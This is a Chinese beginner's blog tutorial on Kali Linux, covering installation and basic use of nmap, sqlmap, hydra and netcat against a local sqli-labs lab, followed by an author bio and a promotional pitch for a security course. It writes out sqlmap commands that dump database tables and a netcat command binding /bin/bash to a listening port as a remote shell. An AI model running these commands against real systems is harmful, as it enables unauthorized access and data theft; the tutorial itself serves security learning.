前言
相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,大白我将在本文中做详细的介绍:
一、kali linux是什么?
Kali Linux 是专门用于渗透测试的Linux操作系统,它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。没错,kali的本质也是linux系统,就好比以前的黑客经常使用一些工具,久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali,主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦

二、安装下载kali
kali的官网地址:https://www.kali.org
目前kali仍然在保持着更新,目前最新的kali系统为kali purple,里面继承了更多的防守方使用的工具。
下载解压后用vm打开即可,默认root账号密码均为kali,kali。没有用过VMware的同学可以先到网上学习如何下载vm。另外新手可能会遇到虚拟机没有网络的问题,新手我这里推荐配置网卡时选择直接连接,等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。(左上角虚拟机,设置,网络适配器,桥接模式,复制物理网络连接状态)
三、kali常见工具介绍

正如刚才所说,kali里集成了大量的黑客工具和网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。
1.nmap
nmap被称为诸神之眼,是一款非常强大的网络探测工具,可以实现主机发现和端口扫描,同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描
nmap最基础用法:
nmap [目的ip]``nmap 192.168.1.10`` ``nmap [目的网段]``nmap 192.168.1.0/24

map也提供了大量的扫描时候可以设置的参数,下面将举例常用的参数:


添加参数可以显示出不同的扫描结果
2.sqlmap
sqlmap是针对sql注入漏洞的一款自动化sql注入探测工具,支持多种操作系统环境和多种数据库的漏洞探测,渗透测试人员常常调侃“没有什么操作技术,就是sqlmap一把梭哈,屏幕显示绿了就直接下班”
sqlmap的基本使用:
sqlmap -u "www.baidu.com"
大家尽量不要在未授权的情况下去对公网资产进行批量扫描,小心去踩缝纫机哦
下面我以sqli-lab里面的靶场为例:

出现图中绿色信息说明sqlmap对该参数成功注入,注意我的url中在最后以GET方式输入了参数id(/?id),如果不给sqlmap提供参数sqlmap是无法使用的哦
找到注入点后的步骤基本是确定的
`sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --dbs #获取当前数据库服务所开启的数据库名称` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 --tables #获取某数据库下的所有表名` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段``sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名 --dump #将该字段的内容全部获取出来并存储,在最后的信息中会有存储路径信息`
第一步获取数据库:

第二步获取数据库下表名:

第三步获取该表字段(其实到表名这一步可以直接–dump获取表里所有内容)

所以sqlmap的使用难处在于如何找到注入点,也就是找到产生sql注入的参数,在例子里参数是GET方式上传的“id”参数,下面提供一些sqlmap常用的参数

3.hydra
hydra又称九头蛇,是一款非常高效的多种协议都可以使用的爆破工具,对指定ip的指定服务进行爆破,需要输入爆破使用的字典或者自己指定爆破使用的数据(比如在已知账号为admin时爆破密码)
在kali中hydra有图形化和命令行两种使用方式

对于新手来说,图形化界面更加简易好用,下面介绍图形化使用


之后选择start就好了,hydra会使用字典中的所有账号密码去做登陆的爆破尝试
4.netcat
netcat简称nc,是一款目前最常用网络工具,它提供基于socket协议套接字针对TCP,UDP连接的网络使用,在具有nc使用权时几乎可以建立任何类型的连接,通常在渗透测试中用该工具获得目的ip的shell
nc简单使用方式:建立连接传输信息
主机1:开启对6666端口的监听
nc -lvp 6666
参数解释:

主机2:连接主机1的6666端口
nc 192.168.0.163 6666

nc常用使用:获取远程主机shell
1.正向连接shell
主机1:
nc -lvp 6666 -e /bin/bash
参数解释:

这里将主机1的/bin/bash重定向到了自己主机的6666端口
主机2:
nc 192.168.0.163 6666

大家可以思考一下为什么左边会有下面的报错呢?并且在执行sudo su尝试进入root权限时,必须在左侧主机输入密码才可以进入,进入后才会收到来自右侧发来的密码kali并且产生报错。可以尝试了解不同终端bash/zsh/sh的区别
总结
本文简单介绍了kali系统,只是适合对没有了解过的新手小白的一个引导
关于我
笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传优快云,朋友们如果需要可以在下方优快云官方认证二维码免费领取【保证100%免费】

865

被折叠的 条评论
为什么被折叠?



